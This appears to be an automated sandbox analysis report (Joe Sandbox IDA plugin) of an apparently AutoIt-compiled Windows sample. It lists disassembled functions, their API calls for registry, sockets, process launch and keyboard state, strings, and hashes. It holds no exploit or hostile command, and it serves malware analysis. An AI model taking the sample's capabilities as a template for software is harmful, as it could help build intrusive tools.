Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: df68f037bed16413a3612f330367965a21bfbfd4acbda48129952ade94e88cff
Instruction ID: 67fdf89936071c6c0a0a7c016316e7249f87791a9d44f9326a3d6bff01926cae
Opcode Fuzzy Hash: df68f037bed16413a3612f330367965a21bfbfd4acbda48129952ade94e88cff
Instruction Fuzzy Hash: AF110D31209762FBE7015B659C82DEA339F9F15310F3040BAF906E63C1E7E0AA40426A

Function 0067A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0067A806

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 40d41bd7346a8da841b31428d9f282872074b82b4542fe6d4e544ab2680e1003
Instruction ID: b6ae91f7e1c359a8cd4e43427ac15bcdd88c5b8f5a8c268ac1c358a7f331a83b
Opcode Fuzzy Hash: 40d41bd7346a8da841b31428d9f282872074b82b4542fe6d4e544ab2680e1003
Instruction Fuzzy Hash: 78C18D75A0421ADFDB44CF98C481BAEB7F6FF48311F208169E609E7341D734A982CB96

Function 00676B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00676B63
LoadStringW.USER32(00000000), ref: 00676B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00676B80
LoadStringW.USER32(00000000), ref: 00676B87
_wprintf.LIBCMT ref: 00676BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00676BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00676BA8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 6ee10f84929fc819af830362eeff22c29f14badb415eaec9a6c92ca198fa0cc1
Instruction ID: cca0bba720dfeb8179176fb65c9ffa62be896bc98d327a36192029da597d6889
Opcode Fuzzy Hash: 6ee10f84929fc819af830362eeff22c29f14badb415eaec9a6c92ca198fa0cc1
Instruction Fuzzy Hash: B4016DF6900248BFEB11ABA4DD89EF6376DDB08304F0045A5B74AE6041EA749E848B70

Function 00692B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00693C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00692BB5,?,?), ref: 00693C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00692BF6

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: cf894c6d9819a9bc60dae03fb71d1959757fe1a2530bb4c5769bb09e45524b09
Instruction ID: ff547a8fc8d6f3405f8106b47652590f03f8ca411882968e55c683ea3a654e46
Opcode Fuzzy Hash: cf894c6d9819a9bc60dae03fb71d1959757fe1a2530bb4c5769bb09e45524b09
Instruction Fuzzy Hash: A6917F71604202AFCB40EF54C8A1BAEB7EAFF44314F14881DF95697291DB34E945CF86

Function 006895BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00689691
WSAGetLastError.WSOCK32(00000000), ref: 0068969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 006896C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006896E9
WSAGetLastError.WSOCK32(00000000), ref: 006896F8
htons.WSOCK32(?,?,?,00000000,?), ref: 006897AA
inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,006CDC00), ref: 00689765

Part of subcall function 0066D2FF: _strlen.LIBCMT ref: 0066D309

_strlen.LIBCMT ref: 00689800

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: 847b222d61c365bcba5b812a7d10d97b573e6b951bf19810950e3ffec89e1f7e
Instruction ID: caca53975ec4d05b86bcee19baac86674965c7da27c611c0a6ba6578025c585f
Opcode Fuzzy Hash: 847b222d61c365bcba5b812a7d10d97b573e6b951bf19810950e3ffec89e1f7e
Instruction Fuzzy Hash: E281FE71504200AFC754EF64CC85EABB7EAEF89710F144A2DF5569B291EB30DD04CBA6

Function 0065A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0065A991

Part of subcall function 00657D7C: __FF_MSGBANNER.LIBCMT ref: 00657D91
Part of subcall function 00657D7C: __NMSG_WRITE.LIBCMT ref: 00657D98
Part of subcall function 00657D7C: __malloc_crt.LIBCMT ref: 00657DB8

__lock.LIBCMT ref: 0065A9A4
__lock.LIBCMT ref: 0065A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,006E6DE0,00000018,00665E7B,?,00000000,00000109), ref: 0065AA0C
EnterCriticalSection.KERNEL32(8000000C,006E6DE0,00000018,00665E7B,?,00000000,00000109), ref: 0065AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 0065AA39

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: a6e69d86ee9477c033aeee953caa0517243d3207de39ea0e87774241b255120b
Instruction ID: 6bd55f4da8cef8584fd15da4ce1aba61082327bbe1642930e29d11e56aa4810d
Opcode Fuzzy Hash: a6e69d86ee9477c033aeee953caa0517243d3207de39ea0e87774241b255120b
Instruction Fuzzy Hash: 1D413B719002059BEB109FA8DE447ACB7B27F01336F10931DEC25AB2D2D7B49949CB95

Function 00698ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00698EE4
GetDC.USER32(00000000), ref: 00698EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00698EF7
ReleaseDC.USER32(00000000,00000000), ref: 00698F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00698F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00698F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0069BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00698F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00698FAA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0f0c0dabc85b4b1a706910c8b815f6b664523c54d94cad0979aa2590ac0c4ad9
Instruction ID: 56c5c2225e87a33952f29cf27b4bff76944e8b60173b3e1b4a0467e2d711c277
Opcode Fuzzy Hash: 0f0c0dabc85b4b1a706910c8b815f6b664523c54d94cad0979aa2590ac0c4ad9
Instruction Fuzzy Hash: 3E315CB2100214BFEF108F50CC4AFEA3BAEEB4A755F045165FE099E291E6759841CB74

Function 006A0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0064B34E: GetWindowLongW.USER32(?,000000EB), ref: 0064B35F

GetSystemMetrics.USER32(0000000F), ref: 006A016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 006A038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006A03AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 006A03D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006A03FF
ShowWindow.USER32(00000003,00000000), ref: 006A0421
DefDlgProcW.USER32(?,00000005,?,?), ref: 006A0440

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 9fee6e0c8c1161b9e4ce0be632868fbb8fb598b4ccf91cbfda88bc1fa45f5d24
Instruction ID: edce933b43a4fe6214fc29fc7640f942babe0b64ada736b02c28eb696896751c
Opcode Fuzzy Hash: 9fee6e0c8c1161b9e4ce0be632868fbb8fb598b4ccf91cbfda88bc1fa45f5d24
Instruction Fuzzy Hash: 5FA19D35600616EBEF18DF68C9857FDBBB2BF0A741F048265E854AB290E734AD51CF90

Function 0064AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2028af97868f472e3d89a3310b880c251f20429711ec5028d597c52c4c93d9
Instruction ID: d15fa45281ca0556c6f88de6133718565dfe414c56c0e7fa553be4462c703012
Opcode Fuzzy Hash: ee2028af97868f472e3d89a3310b880c251f20429711ec5028d597c52c4c93d9
Instruction Fuzzy Hash: 74718DB1904109FFDB44DF98CC88AEEBB76FF86314F148149F915AA251C330AA46CF65

Function 00692230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0069225A
_memset.LIBCMT ref: 00692323
ShellExecuteExW.SHELL32(?), ref: 00692368

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

Part of subcall function 0064C6F4: _wcscpy.LIBCMT ref: 0064C717

CloseHandle.KERNEL32(00000000), ref: 0069242F
FreeLibrary.KERNEL32(00000000), ref: 0069243E

Strings

@, xrefs: 00692334

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 08cbffff79eff7dbe7d35886d0921109fd6ded44be3e9c9b89daa0b8a02c2991
Instruction ID: da26ad88abec702d7b10e80b59a5f62e854961535248207afe378d5a4a088b90
Opcode Fuzzy Hash: 08cbffff79eff7dbe7d35886d0921109fd6ded44be3e9c9b89daa0b8a02c2991
Instruction Fuzzy Hash: C9716EB490061AAFCF44EF94C89199EB7F6FF48310F10855DE855AB751DB34AD40CB94

Function 00673DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00673DE7
GetKeyboardState.USER32(?), ref: 00673DFC
SetKeyboardState.USER32(?), ref: 00673E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00673E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00673EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00673EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00673F13

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 01628a78303ad5b63ed1530c0df5542801cf6b69f77c3454ef6fc561bd779dd5
Instruction ID: c1b1bebfbfbe8bbee8d6f87e2d3263acf27d1c2bc70f1e76b8c6ac8dfe8a5638
Opcode Fuzzy Hash: 01628a78303ad5b63ed1530c0df5542801cf6b69f77c3454ef6fc561bd779dd5
Instruction Fuzzy Hash: 3E51C3A0A147E53DFB3646348C45BF67EA75B06304F08C58EE0DD46AC2D7989EC4E750

Function 00673BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00673C02
GetKeyboardState.USER32(?), ref: 00673C17
SetKeyboardState.USER32(?), ref: 00673C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00673CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00673CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00673D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00673D26

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 73c8a64a8dcf354c69a67773b473dc26d40c52594c18394b004fdc996cc649df
Instruction ID: 2d82fdcfabf40522069433e9fa486171a0a33b55371d67fa4df6fbdfa4d84369
Opcode Fuzzy Hash: 73c8a64a8dcf354c69a67773b473dc26d40c52594c18394b004fdc996cc649df
Instruction Fuzzy Hash: 2D51D3A15047E539FB3687248C55BF6BF9AAF06300F08C588E0DD5A6C2D795EE84F760

Function 00677DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00677DBE
_wcsncpy.LIBCMT ref: 00677DF3
_wcsncpy.LIBCMT ref: 00677E25
_wcsncpy.LIBCMT ref: 00677E58
_wcsncpy.LIBCMT ref: 00677E9A
_wcsncpy.LIBCMT ref: 00677ED4
_wcsncpy.LIBCMT ref: 00677F03

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: cd96c942c098548dbe109e664a7c3add0cffb42fa437b68c7b52258f1c4f25b1
Instruction ID: 2a99938507ea1ab181716ce9ccf79d46086fc1a676c67cbcf75729986f18719e
Opcode Fuzzy Hash: cd96c942c098548dbe109e664a7c3add0cffb42fa437b68c7b52258f1c4f25b1
Instruction Fuzzy Hash: 41417266C1025476DF50EBF4CC46ACFB3AE9F06311F5489AAE918F3121F634E61883A9

Function 00693D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00693DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00693DCB
FreeLibrary.KERNEL32(00000000), ref: 00693E80

Part of subcall function 00693D72: RegCloseKey.ADVAPI32(?), ref: 00693DE8
Part of subcall function 00693D72: FreeLibrary.KERNEL32(?), ref: 00693E3A
Part of subcall function 00693D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00693E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00693E25

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: a01303ed169e16c5d06728391574aa8c9b5e5edd1d5364b5aa1cdce0f5bebdab
Instruction ID: 42cd7a4e81f5bfe73a5299cc7445fee0b357552bff9e121fb7ce3c03d749637f
Opcode Fuzzy Hash: a01303ed169e16c5d06728391574aa8c9b5e5edd1d5364b5aa1cdce0f5bebdab
Instruction Fuzzy Hash: 3C311AB1901119BFDF159F94DC89AFFB7BEEF08300F00016AE512E6651E6749F899BA0

Function 00698FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00698FE7
GetWindowLongW.USER32(012CE568,000000F0), ref: 0069901A
GetWindowLongW.USER32(012CE568,000000F0), ref: 0069904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00699081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006990AB
GetWindowLongW.USER32(00000000,000000F0), ref: 006990BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006990D6

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: ee62a269eb7f6dd1a1c589700b4b51c043f01ab291a9e9ff3aaa9563aaa27523
Instruction ID: bb0163e8622935dcea1ee17664aa55e36dfbd77b0884180d9883eecf301c544d
Opcode Fuzzy Hash: ee62a269eb7f6dd1a1c589700b4b51c043f01ab291a9e9ff3aaa9563aaa27523
Instruction Fuzzy Hash: 78313474600215EFDF208F58DC94FA437AAFB4A354F141268F929CF6B1DB72A881DB61

Function 006708AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006708F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00670918
SysAllocString.OLEAUT32(00000000), ref: 0067091B
SysAllocString.OLEAUT32(?), ref: 00670939
SysFreeString.OLEAUT32(?), ref: 00670942
StringFromGUID2.OLE32(?,?,00000028), ref: 00670967
SysAllocString.OLEAUT32(?), ref: 00670975

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 72092e845f4eb68324a22703a735d9cfac27a8c425d1ea1c7d9eb86b802412d9
Instruction ID: 9f1bfca50dc82bc88ce2a89256c0dda77b2adf2bbb5458f32049cc66fcb6f23f
Opcode Fuzzy Hash: 72092e845f4eb68324a22703a735d9cfac27a8c425d1ea1c7d9eb86b802412d9
Instruction Fuzzy Hash: 78216576601219BFAB109F68DC88DEB73EDEB09360B00D225FA19DB251E670EC458B64

Function 00672472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00672485
__wcsnicmp.LIBCMT ref: 006724A6
__wcsnicmp.LIBCMT ref: 006724C0

Strings

#requireadmin, xrefs: 006724A0
#notrayicon, xrefs: 0067247D
#OnAutoItStartRegister, xrefs: 006724BA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 879ffbd11c23a95befd588c3c57680576ae9697f2b324b3ec2136e66daa6e0ee
Instruction ID: b17cf525d0c6f1aba9cd414ed7d276f63894cc01956543551892b003cf10076c
Opcode Fuzzy Hash: 879ffbd11c23a95befd588c3c57680576ae9697f2b324b3ec2136e66daa6e0ee
Instruction Fuzzy Hash: 06213A7210415277D320AB24DD22FBB73DBEF65310F14C02DF84E97245E6619992C399

Function 00670986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

